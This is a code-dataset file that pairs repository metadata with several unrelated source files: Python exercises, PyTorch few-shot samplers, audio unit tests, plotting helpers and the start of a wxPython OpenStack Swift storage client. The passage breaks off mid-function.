d96dc4662adc1c8329b731b9c9b7fa4ecf69ec16
|
[
"MIT"
] | null | null | null |
ENTRY_MODULE/ConditionalStatementsAdvanced/LAB/04_Personal_Titles.py
|
sleepychild/ProgramingBasicsPython
|
d96dc4662adc1c8329b731b9c9b7fa4ecf69ec16
|
[
"MIT"
] | 1
|
2022-01-15T10:33:56.000Z
|
2022-01-15T10:33:56.000Z
|
ENTRY_MODULE/ConditionalStatementsAdvanced/LAB/04_Personal_Titles.py
|
sleepychild/ProgramingBasicsPython
|
d96dc4662adc1c8329b731b9c9b7fa4ecf69ec16
|
[
"MIT"
] | null | null | null |
if float(input()) < 16 :
print('Master' if input() == 'm' else 'Miss')
else:
print('Mr.' if input() == 'm' else 'Ms.')
| 25.4
| 49
| 0.519685
| 19
| 127
| 3.473684
| 0.578947
| 0.212121
| 0.242424
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020202
| 0.220472
| 127
| 4
| 50
| 31.75
| 0.646465
| 0
| 0
| 0
| 0
| 0
| 0.141732
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
d96d94940183cd1edffed965a5f1a2ed0e43d1af
| 6,475
|
py
|
Python
|
loader/samplers.py
|
Max-luo-song/fs-map-project
|
4e9d86e182d9a4b969e86b12d72f227e4fd4fd09
|
[
"Apache-2.0"
] | 1
|
2021-08-20T06:22:57.000Z
|
2021-08-20T06:22:57.000Z
|
loader/samplers.py
|
Max-luo-song/fs-map-project
|
4e9d86e182d9a4b969e86b12d72f227e4fd4fd09
|
[
"Apache-2.0"
] | null | null | null |
loader/samplers.py
|
Max-luo-song/fs-map-project
|
4e9d86e182d9a4b969e86b12d72f227e4fd4fd09
|
[
"Apache-2.0"
] | 4
|
2021-08-20T06:23:02.000Z
|
2022-01-06T12:09:07.000Z
|
import torch
import numpy as np
# For segmentation
class CategoriesSampler:
def __init__(self, all_labels, label_stat, n_batch, n_cls, n_per):
self.n_batch = n_batch # the number of iterations in the dataloader
self.n_cls = n_cls
self.n_per = n_per
# sanity check the number of instances of each class
for k, n in label_stat.items():
assert n >= self.n_per
self.label_stat = label_stat
# print(self.label_stat)
labels = np.array(sorted(list(self.label_stat.keys()))) # all data label
print(labels)
all_labels = np.array(all_labels) # all data label
self.m_ind = {} # the data index of each class
for i in labels:
# print(i)
ind = np.argwhere(all_labels == i).reshape(-1) # all data index of this class
ind = torch.from_numpy(ind)
self.m_ind[i] = ind
self.labels = labels
self.num_labels = len(self.labels) - 1 # discard bg class 0
# print(self.num_labels, self.n_cls,'----')
# assert self.num_labels >= self.n_cls
self.fixed_batches = []
self.fixed_batches_classes = []
self.mode = 'rand' # 'probe', 'fix'
def __len__(self):
return self.n_batch
def __iter__(self):
if self.mode == 'rand':
for i_batch in range(self.n_batch):
batch = []
classes = torch.randperm(self.num_labels)[:self.n_cls] # random sample num_class indices,e.g. 5
for c in classes:
cls = self.labels[c + 1]
l = self.m_ind[cls] # all data indexs of this class
pos = torch.randperm(len(l))[:self.n_per] # sample n_per data index of this class
batch.append(l[pos])
batch = torch.stack(batch).t().reshape(-1)
# .t() transpose,
# due to it, the label is in the sequence of abcdabcdabcd form after reshape,
# instead of aaaabbbbccccdddd
yield batch
elif self.mode == 'probe':
for i_batch in range(self.n_batch):
batch = []
classes = torch.randperm(self.num_labels)[:self.n_cls] # random sample num_class indices,e.g. 5
for c in classes:
cls = self.labels[c + 1]
l = self.m_ind[cls] # all data indexs of this class
pos = torch.randperm(len(l))[:self.n_per] # sample n_per data index of this class
batch.append(l[pos])
self.fixed_batches.append(batch)
batch_t = torch.stack(batch).t().reshape(-1)
# .t() transpose,
# due to it, the label is in the sequence of abcdabcdabcd form after reshape,
# instead of aaaabbbbccccdddd
yield batch_t
else:
assert self.mode == 'fix'
assert len(self.fixed_batches)==self.n_batch
#print(self.fixed_batches)
for ix, batch in enumerate(self.fixed_batches):
batch_t = torch.stack(batch).t().reshape(-1)
yield batch_t
# For segmentation
# not deterministic for validation
class CategoriesSampler_v11:
def __init__(self, all_labels, label_stat, n_batch, n_cls, n_per):
self.n_batch = n_batch # the number of iterations in the dataloader
self.n_cls = n_cls
self.n_per = n_per
# sanity check the number of instances of each class
for k, n in label_stat.items():
if n < self.n_per:
del label_stat[k]
self.label_stat = label_stat
# print(self.label_stat)
labels = np.array(sorted(list(self.label_stat.keys()))) # all data label
# print(labels)
all_labels = np.array(all_labels) # all data label
self.m_ind = {} # the data index of each class
for i in labels:
# print(i)
ind = np.argwhere(all_labels == i).reshape(-1) # all data index of this class
ind = torch.from_numpy(ind)
self.m_ind[i] = ind
self.labels = labels
self.num_labels = len(self.labels) - 1 # discard bg class 0
# print(self.num_labels, self.n_cls,'----')
# assert self.num_labels >= self.n_cls
def __len__(self):
return self.n_batch
def __iter__(self):
for i_batch in range(self.n_batch):
batch = []
classes = torch.randperm(self.num_labels)[:self.n_cls] # random sample num_class indices,e.g. 5
for c in classes:
cls = self.labels[c + 1]
l = self.m_ind[cls] # all data indexs of this class
pos = torch.randperm(len(l))[:self.n_per] # sample n_per data index of this class
batch.append(l[pos])
batch = torch.stack(batch).t().reshape(-1)
# .t() transpose,
# due to it, the label is in the sequence of abcdabcdabcd form after reshape,
# instead of aaaabbbbccccdddd
yield batch
class CategoriesClassificationSampler:
def __init__(self, all_label, split_label, n_batch, n_cls, n_per):
self.n_batch = n_batch # the number of iterations in the dataloader
self.n_cls = n_cls
self.n_per = n_per
self.split_label = split_label
label = np.array(all_label) # all data label
self.m_ind = [] # the data index of each class
for i in range(max(label) + 1):
ind = np.argwhere(label == i).reshape(-1) # all data index of this class
ind = torch.from_numpy(ind)
self.m_ind.append(ind)
def __len__(self):
return self.n_batch
def __iter__(self):
for i_batch in range(self.n_batch):
batch = []
classes = torch.randperm(len(self.m_ind))[:self.n_cls] # random sample num_class indices,e.g. 5
for c in classes:
l = self.m_ind[c] # all data indexs of this class
pos = torch.randperm(len(l))[:self.n_per] # sample n_per data index of this class
batch.append(l[pos])
batch = torch.stack(batch).t().reshape(-1)
# .t() transpose,
# due to it, the label is in the sequence of abcdabcdabcd form after reshape,
# instead of aaaabbbbccccdddd
yield batch
| 39.242424
| 112
| 0.567104
| 887
| 6,475
| 3.961669
| 0.114994
| 0.044109
| 0.031303
| 0.02988
| 0.833523
| 0.833523
| 0.833523
| 0.833523
| 0.823278
| 0.823278
| 0
| 0.005122
| 0.33668
| 6,475
| 164
| 113
| 39.481707
| 0.813038
| 0.27305
| 0
| 0.745455
| 0
| 0
| 0.003441
| 0
| 0
| 0
| 0
| 0
| 0.027273
| 1
| 0.081818
| false
| 0
| 0.018182
| 0.027273
| 0.154545
| 0.009091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7944dceebbcb826ba9c50a7f7916bbeca6b14436
| 272
|
py
|
Python
|
examples/where.py
|
nahid/py-jsonq
|
badfde55ab369e8daf1dcb36dfe782d808afe6a3
|
[
"MIT"
] | null | null | null |
examples/where.py
|
nahid/py-jsonq
|
badfde55ab369e8daf1dcb36dfe782d808afe6a3
|
[
"MIT"
] | null | null | null |
examples/where.py
|
nahid/py-jsonq
|
badfde55ab369e8daf1dcb36dfe782d808afe6a3
|
[
"MIT"
] | 1
|
2019-09-20T01:27:33.000Z
|
2019-09-20T01:27:33.000Z
|
from pyjsonq.query import JsonQ
e1 = JsonQ("./data.json").at("users").where("id", ">", 3).where("location", "=", "Barisal").get()
print("result", e1)
e2 = JsonQ("./data.json").at("users").where("id", ">", 3).where("location", "=", "Barisal").get()
print("result", e2)
| 27.2
| 97
| 0.584559
| 37
| 272
| 4.297297
| 0.513514
| 0.113208
| 0.163522
| 0.188679
| 0.779874
| 0.779874
| 0.779874
| 0.779874
| 0.779874
| 0.779874
| 0
| 0.02439
| 0.095588
| 272
| 9
| 98
| 30.222222
| 0.621951
| 0
| 0
| 0
| 0
| 0
| 0.301471
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0.4
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7985f756beb32b088b8c92bc85f429e3c0e29df6
| 4,603
|
py
|
Python
|
tests/test_audios.py
|
Desenho2018-1/tatics-framework
|
46a9ea99eeb46fdc5a048c41fa478cbfaeb1ee85
|
[
"MIT"
] | 4
|
2018-06-08T00:49:54.000Z
|
2021-08-06T04:45:04.000Z
|
tests/test_audios.py
|
Desenho2018-1/tatics-framework
|
46a9ea99eeb46fdc5a048c41fa478cbfaeb1ee85
|
[
"MIT"
] | 28
|
2018-05-29T11:32:53.000Z
|
2019-10-22T18:30:55.000Z
|
tests/test_audios.py
|
rodrigocam/simian
|
157a7424f28bd0656a4e400817b561ffc987ddd5
|
[
"MIT"
] | 2
|
2018-06-30T02:46:22.000Z
|
2020-04-30T15:17:04.000Z
|
import unittest
import pygame
from simian.audio.audios import Sound, Music
from simian.audio.audio_manager import AudioManager
class SoundTest(unittest.TestCase):
def setUp(self):
self.audio_manager = AudioManager()
def test_should_create_sound(self):
try:
sound = Sound('sound.wav')
self.assertTrue(True)
except:
self.assertTrue(False)
def test_should_not_create_sound(self):
try:
sound = Sound('doesnt_exist.wav')
self.assertTrue(False)
except:
self.assertTrue(True)
def test_should_play_sound(self):
sound = Sound('sound.wav')
self.assertTrue(sound.play())
def test_should_not_play_sound(self):
try:
sound = Sound('doesnt_exist.wav')
sound.play()
self.assertTrue(False)
except:
self.assertTrue(True)
def test_should_play_music(self):
music = Music('music.mp3')
self.assertTrue(music.play())
class AudioManagerTest(unittest.TestCase):
def test_should_construct_music(self):
self.audio_manager = AudioManager()
self.assertTrue(self.audio_manager.music is None)
self.assertTrue(not self.audio_manager.sounds)
def test_should_play_music(self):
self.audio_manager = AudioManager()
response = self.audio_manager.play_music('music.mp3')
self.assertTrue(response)
def test_should_not_play_music(self):
self.audio_manager = AudioManager()
try:
self.audio_manager.play_music('doesnt_exist.mp3')
self.assertTrue(False)
except:
self.assertTrue(True)
def test_should_stop_music(self):
self.audio_manager = AudioManager()
self.audio_manager.play_music('music.mp3')
try:
self.audio_manager.stop_music()
self.assertTrue(True)
except:
self.assertTrue(False)
def test_should_not_stop_music(self):
self.audio_manager = AudioManager()
try:
self.audio_manager.stop_music()
self.assertTrue(False)
except:
self.assertTrue(True)
def test_should_fade_out_music(self):
self.audio_manager = AudioManager()
self.audio_manager.play_music('music.mp3')
try:
self.audio_manager.fade_out_music(1)
self.assertTrue(True)
except:
self.assertTrue(False)
def test_should_not_fade_out_music(self):
self.audio_manager = AudioManager()
try:
self.audio_manager.fade_out_music(1)
self.assertTrue(False)
except:
self.assertTrue(True)
def test_should_add_sound(self):
self.audio_manager = AudioManager()
self.assertTrue(self.audio_manager.add_sound('sound.wav'))
def test_should_play_sound(self):
self.audio_manager = AudioManager()
self.audio_manager.add_sound('sound.wav')
try:
self.audio_manager.play_sound('sound.wav')
self.assertTrue(True)
except:
self.assertTrue(False)
def test_should_not_play_sound(self):
self.audio_manager = AudioManager()
try:
self.audio_manager.play_sound('doesnt_exist')
self.assertTrue(False)
except:
self.assertTrue(True)
def test_should_stop_sound(self):
self.audio_manager = AudioManager()
self.audio_manager.add_sound('sound.wav')
self.audio_manager.play_sound('sound.wav')
try:
self.audio_manager.stop_sound('sound.wav')
self.assertTrue(True)
except:
self.assertTrue(False)
def test_should_not_stop_sound(self):
self.audio_manager = AudioManager()
try:
self.audio_manager.fade_out_sound('sound.wav')
self.assertTrue(False)
except:
self.assertTrue(True)
def test_should_fade_out_sound(self):
self.audio_manager = AudioManager()
self.audio_manager.add_sound('sound.wav')
self.audio_manager.play_sound('sound.wav')
try:
self.audio_manager.fade_out_sound('sound.wav', 1)
self.assertTrue(False)
except:
self.assertTrue(True)
def test_should_not_fade_out_sound(self):
self.audio_manager = AudioManager()
try:
self.audio_manager.fade_out_sound('sound.wav', 1)
self.assertTrue(False)
except:
self.assertTrue(True)
| 28.067073
| 66
| 0.620899
| 522
| 4,603
| 5.214559
| 0.08046
| 0.167524
| 0.217487
| 0.110213
| 0.873622
| 0.837619
| 0.796106
| 0.739162
| 0.702057
| 0.702057
| 0
| 0.002732
| 0.28438
| 4,603
| 163
| 67
| 28.239264
| 0.823619
| 0
| 0
| 0.742188
| 0
| 0
| 0.046274
| 0
| 0
| 0
| 0
| 0
| 0.265625
| 1
| 0.15625
| false
| 0
| 0.03125
| 0
| 0.203125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
79ad4de72e064ac3201e520cb29162f873e95096
| 1,865
|
py
|
Python
|
tabular data/regression/Benchmarks/4. gpu performances/plotFunctions/PlotMSEDiscr.py
|
RemilYoucef/SPLITSD4X
|
e7625a4d649e7d61bebcf193d956c5d73ee5e08b
|
[
"MIT"
] | 2
|
2021-02-10T08:29:19.000Z
|
2021-04-29T14:33:31.000Z
|
tabular data/regression/Benchmarks/5. temperature forecast/plotFunctions/PlotMSEDiscr.py
|
RemilYoucef/SPLITSD4X
|
e7625a4d649e7d61bebcf193d956c5d73ee5e08b
|
[
"MIT"
] | null | null | null |
tabular data/regression/Benchmarks/5. temperature forecast/plotFunctions/PlotMSEDiscr.py
|
RemilYoucef/SPLITSD4X
|
e7625a4d649e7d61bebcf193d956c5d73ee5e08b
|
[
"MIT"
] | null | null | null |
'''
Created on Mar 28, 2020
@author: anesbendimerad
'''
from plotFunctions.PlotCurves import plotOneCase
def plotMSEDiscFreq(case,path):
resultsPath="FIGURES/MSE_Disc_Freq"+case+".png"
title=case
#cpt=0
#dividor=1
nbObjects=float(1)
keys=["Generation_1","Generation_2","Generation_3","Generation_4","Generation_5","Generation_6","Generation_7"]
legends=["k = 4","k = 5","k = 6","k = 7","k = 8","k = 9","k = 10"]
yValues=[[],[],[],[],[],[],[]]
index=-1
with open(path + "mse_disc_freq.txt","r") as f:
for line in f:
if line.replace("\n","").replace("\r","") in keys:
index+=1
else:
yValues[index].append(float(line)/nbObjects)
xValues=[i+1 for i in range(len(yValues[0]))]
plotOneCase(xValues, yValues, "# subgroups (K)", "MSE", legends, resultsPath, title, useMarker=[True,True,True,True,True,True,True],legendsLoc="upper right",markevery=int(15*len(xValues)/100))
def plotMSEDiscWidth(case,path):
resultsPath="FIGURES/MSE_Disc_Width"+case+".png"
title=case
#cpt=0
#dividor=1
nbObjects=float(1)
keys=["Generation_1","Generation_2","Generation_3","Generation_4","Generation_5","Generation_6","Generation_7"]
legends=["k = 4","k = 5","k = 6","k = 7","k = 8","k = 9","k = 10"]
yValues=[[],[],[],[],[],[],[]]
index=-1
with open(path + "MSE_Disc_Width.txt","r") as f:
for line in f:
if line.replace("\n","").replace("\r","") in keys:
index+=1
else:
yValues[index].append(float(line)/nbObjects)
xValues=[i+1 for i in range(len(yValues[0]))]
plotOneCase(xValues, yValues, "# subgroups (K)", "MSE", legends, resultsPath, title, useMarker=[True,True,True,True,True,True,True],legendsLoc="upper right",markevery=int(15*len(xValues)/100))
| 39.680851
| 196
| 0.597855
| 252
| 1,865
| 4.337302
| 0.293651
| 0.087832
| 0.10979
| 0.117109
| 0.874657
| 0.874657
| 0.814273
| 0.814273
| 0.814273
| 0.814273
| 0
| 0.040027
| 0.196247
| 1,865
| 47
| 197
| 39.680851
| 0.689126
| 0.041287
| 0
| 0.787879
| 0
| 0
| 0.221597
| 0.024184
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.030303
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79da709041d4bf7c39a4dc10e2e9b0cb7e824953
| 32,712
|
py
|
Python
|
SwiftFunction.py
|
SongBS/SwiftManager
|
2fdb7fe8987139b9b050c77a5d711bcdae2d1a62
|
[
"Apache-2.0"
] | null | null | null |
SwiftFunction.py
|
SongBS/SwiftManager
|
2fdb7fe8987139b9b050c77a5d711bcdae2d1a62
|
[
"Apache-2.0"
] | null | null | null |
SwiftFunction.py
|
SongBS/SwiftManager
|
2fdb7fe8987139b9b050c77a5d711bcdae2d1a62
|
[
"Apache-2.0"
] | null | null | null |
#-*-coding:cp949-*-
'''
Created on 2013. 6. 24.
@author: sbs@gabia.com
'''
import wx
import os
import pycurl
import cStringIO
import DialogClass
import json
def progress(download_t, download_d, upload_t, upload_d):
print "Total to download", download_t
print "Total downloaded", download_d
print "Total to upload", upload_t
print "Total uploaded", upload_d
def SwiftAuth(self):
headerBuf = cStringIO.StringIO()
bodyBuf = cStringIO.StringIO()
requestHeader = "X-Storage-User: %s:%s\r\nX-Storage-Pass: %s\r\nX-Auth-New-Token: %s\r\nX-Auth-Token-Lifetime: %s\r\n\r\n" \
%(self.swift_account, self.swift_user, self.swift_passwd, self.swift_tokenNew, self.swift_tokenTTL)
c = pycurl.Curl()
c.setopt(pycurl.URL, self.swift_url)
c.setopt(pycurl.SSL_VERIFYPEER, False)
c.setopt(pycurl.VERBOSE, False)
c.setopt(pycurl.TCP_NODELAY, True)
c.setopt(pycurl.HTTPHEADER, [requestHeader])
c.setopt(pycurl.CUSTOMREQUEST, "GET")
c.setopt(c.HEADERFUNCTION, headerBuf.write)
c.setopt(c.WRITEFUNCTION, bodyBuf.write)
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
if not(rtn == 200):
wx.MessageBox('User Authentication Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
self.textControl.AppendText(">User Authentication Failed\r\n")
#self.textControl.AppendText(requestHeader)
#self.textControl.AppendText(headerBuf.getvalue())
#self.textControl.AppendText(bodyBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
else:
for x in headerBuf.getvalue().splitlines():
sLine = x.split(":", 1)
if "X-Auth-Token" in sLine :
self.authToken = sLine[1].strip()
if "X-Storage-Url" in sLine :
self.storageUrl = sLine[1].strip()
if "X-Auth-Token-Expires" in sLine:
tokenTTL = sLine[1].strip()
self.textControl.AppendText(">User Authentication Success\r\n")
self.textControl.AppendText("X-Auth-Token: %s \r\n" %self.authToken)
self.textControl.AppendText("X-Storage-Path: %s \r\n" %self.storageUrl)
self.textControl.AppendText("Token Expire: %s \r\n" %tokenTTL)
#self.textControl.AppendText(requestHeader)
#self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
#self.textControl.AppendText(headerBuf.getvalue())
#self.textControl.AppendText(bodyBuf.getvalue())
#self.textControl.AppendText("\r\n\r\n")
#self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
#self.textControl.Clear()
#self.textControl.SetValue(requestHeader)
#self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
#self.textControl.AppendText(headerBuf.getvalue())
#self.textControl.AppendText(bodyBuf.getvalue())
#self.textControl.SetInsertionPoint(1)
headerBuf.close()
bodyBuf.close()
c.close()
return
def ListContainer(self):
if self.authToken == "":
wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
headerBuf = cStringIO.StringIO()
bodyBuf = cStringIO.StringIO()
requestHeader = "X-AUth-Token: %s\r\n\r\n" %(self.authToken)
c = pycurl.Curl()
c.setopt(pycurl.URL, self.storageUrl+"?format=json")
c.setopt(pycurl.SSL_VERIFYPEER, False)
c.setopt(pycurl.VERBOSE, False)
c.setopt(pycurl.TCP_NODELAY, True)
c.setopt(pycurl.HTTPHEADER, [requestHeader])
c.setopt(pycurl.CUSTOMREQUEST, "GET")
c.setopt(c.HEADERFUNCTION, headerBuf.write)
c.setopt(c.WRITEFUNCTION, bodyBuf.write)
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
if not(rtn == 200):
if (rtn == 404):
self.textControl.AppendText("<EMPTY>\r\n")
else:
wx.MessageBox('Show Container List Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
self.textControl.AppendText(">Show Container List Failed\r\n")
self.textControl.AppendText(headerBuf.getvalue())
self.textControl.AppendText(bodyBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
else:
self.textControl.AppendText(">Show Container List Success\r\n")
self.textControl.AppendText("--------------------------------------------------------------------------------------\r\n")
self.textControl.AppendText("[Name]\t\t[Files]\t\t[Bytes]\r\n")
self.textControl.AppendText("--------------------------------------------------------------------------------------\r\n")
decoded = json.loads(bodyBuf.getvalue())
for i in decoded:
self.textControl.AppendText("%s\t\t%s\t\t%s\t\t\r\n" %(i['name'], i['count'], i['bytes']))
self.textControl.AppendText("\r\n")
headerBuf.close()
bodyBuf.close()
c.close()
def SelectContainer(self):
if self.authToken == "":
wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
textDialog = wx.TextEntryDialog(self, 'Enter a Container Name to Use', 'Notices', '', wx.OK|wx.CANCEL|wx.CENTRE)
if textDialog.ShowModal() == wx.ID_OK:
self.selectedContainer = textDialog.GetValue().strip()
self.selectedContainer = self.selectedContainer.encode('utf-8')
self.textControl.AppendText(">Container Change Success\r\n")
self.textControl.AppendText("Container Selected: %s\r\n\r\n" %self.selectedContainer)
textDialog.Destroy()
def CreateContainer(self):
if self.authToken == "":
wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
containerUrl = ""
textDialog = wx.TextEntryDialog(self, 'Enter a Container Name to Create', 'Create Container', '', wx.OK|wx.CANCEL|wx.CENTRE)
if textDialog.ShowModal() == wx.ID_OK:
containerUrl = textDialog.GetValue().strip()
containerUrl = containerUrl.encode('utf-8')
textDialog.Destroy()
if containerUrl == "":
self.EmptyInput()
return
headerBuf = cStringIO.StringIO()
bodyBuf = cStringIO.StringIO()
requestHeader = "X-Auth-Token: %s\r\n\r\n" %(self.authToken)
c = pycurl.Curl()
c.setopt(pycurl.URL, self.storageUrl+"/"+containerUrl)
c.setopt(pycurl.SSL_VERIFYPEER, False)
c.setopt(pycurl.VERBOSE, False)
c.setopt(pycurl.TCP_NODELAY, True)
c.setopt(pycurl.HTTPHEADER, [requestHeader])
c.setopt(pycurl.CUSTOMREQUEST, "PUT")
c.setopt(c.HEADERFUNCTION, headerBuf.write)
c.setopt(c.WRITEFUNCTION, bodyBuf.write)
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
if not(rtn == 201 or rtn == 202) :
wx.MessageBox('Container Create Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
self.textControl.AppendText(">Container Create Failed\n")
self.textControl.AppendText(headerBuf.getvalue())
self.textControl.AppendText(bodyBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
else:
self.textControl.AppendText(">Create Container Success\r\n")
self.textControl.AppendText("Created Container :%s\r\n\r\n" %containerUrl)
headerBuf.close()
bodyBuf.close()
c.close()
return
def DeleteContainer(self):
if self.authToken == "":
wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
containerUrl = ""
textDialog = wx.TextEntryDialog(self, 'Enter a Container Name to Delete', 'Delete Container', '', wx.OK|wx.CANCEL|wx.CENTRE)
if textDialog.ShowModal() == wx.ID_OK:
containerUrl = textDialog.GetValue().strip()
containerUrl = containerUrl.encode('utf-8')
textDialog.Destroy()
if containerUrl == "":
self.EmptyInput()
return
headerBuf = cStringIO.StringIO()
bodyBuf = cStringIO.StringIO()
requestHeader = "X-AUth-Token: %s\r\n\r\n" %(self.authToken)
c = pycurl.Curl()
c.setopt(pycurl.URL, self.storageUrl+"/"+containerUrl)
c.setopt(pycurl.SSL_VERIFYPEER, False)
c.setopt(pycurl.VERBOSE, False)
c.setopt(pycurl.TCP_NODELAY, True)
c.setopt(pycurl.HTTPHEADER, [requestHeader])
c.setopt(pycurl.CUSTOMREQUEST, "DELETE")
c.setopt(c.HEADERFUNCTION, headerBuf.write)
c.setopt(c.WRITEFUNCTION, bodyBuf.write)
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
if not(rtn == 204) :
wx.MessageBox('Container Delete Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
self.textControl.AppendText(">Container Delete Failed\r\n")
self.textControl.AppendText(headerBuf.getvalue())
self.textControl.AppendText(bodyBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
else:
self.textControl.AppendText(">Container Delete Success\r\n")
self.textControl.AppendText("Deleted Container :%s\r\n\r\n" %containerUrl)
headerBuf.close()
bodyBuf.close()
c.close()
return
def ListObject(self):
if self.authToken == "":
wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
if self.selectedContainer == "":
wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
headerBuf = cStringIO.StringIO()
bodyBuf = cStringIO.StringIO()
requestHeader = "X-AUth-Token: %s\r\n\r\n\r\n" %(self.authToken)
c = pycurl.Curl()
c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"?format=json") #?limit=2&marker=objectname
c.setopt(pycurl.SSL_VERIFYPEER, False)
c.setopt(pycurl.VERBOSE, False)
c.setopt(pycurl.TCP_NODELAY, True)
c.setopt(pycurl.HTTPHEADER, [requestHeader])
c.setopt(pycurl.CUSTOMREQUEST, "GET")
c.setopt(c.HEADERFUNCTION, headerBuf.write)
c.setopt(c.WRITEFUNCTION, bodyBuf.write)
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
if not(rtn == 200 or rtn == 204) :
if (rtn == 404):
self.textControl.AppendText("<EMPTY>\r\n")
else:
wx.MessageBox('Show Object List Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
self.textControl.AppendText(">Show Object List Failed\r\n")
self.textControl.AppendText(headerBuf.getvalue())
self.textControl.AppendText(bodyBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
else:
self.textControl.AppendText(">Show Object List Success\r\n")
self.textControl.AppendText("--------------------------------------------------------------------------------------\r\n")
self.textControl.AppendText("[Name]\t\t[Bytes]\t\t[Last_Modified]\r\n")
self.textControl.AppendText("--------------------------------------------------------------------------------------\r\n")
decoded = json.loads(bodyBuf.getvalue())
totalObject = 0
for i in decoded:
totalObject = totalObject + 1
self.textControl.AppendText("%s\t\t%s\t\t%s\r\n" %(i['name'], i['bytes'], i['last_modified']))
self.textControl.AppendText("\r\n")
self.textControl.AppendText("Tatal Object : %d\r\n" %totalObject)
marker = "&marker=%s" %(i['name'])
headerBuf.close()
bodyBuf.close()
c.close()
if totalObject == 10000:
headerBuf = cStringIO.StringIO()
bodyBuf = cStringIO.StringIO()
requestHeader = "X-AUth-Token: %s\r\n\r\n\r\n" %(self.authToken)
c = pycurl.Curl()
c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"?format=json"+marker.encode('utf-8')) #?limit=2&marker=objectname
c.setopt(pycurl.SSL_VERIFYPEER, False)
c.setopt(pycurl.VERBOSE, False)
c.setopt(pycurl.TCP_NODELAY, True)
c.setopt(pycurl.HTTPHEADER, [requestHeader])
c.setopt(pycurl.CUSTOMREQUEST, "GET")
c.setopt(c.HEADERFUNCTION, headerBuf.write)
c.setopt(c.WRITEFUNCTION, bodyBuf.write)
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
if not(rtn == 200 or rtn == 204) :
if (rtn == 404):
self.textControl.AppendText("<EMPTY>\r\n")
else:
wx.MessageBox('Show Object List Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
self.textControl.AppendText(">Show Object List Failed\r\n")
self.textControl.AppendText(headerBuf.getvalue())
self.textControl.AppendText(bodyBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
else:
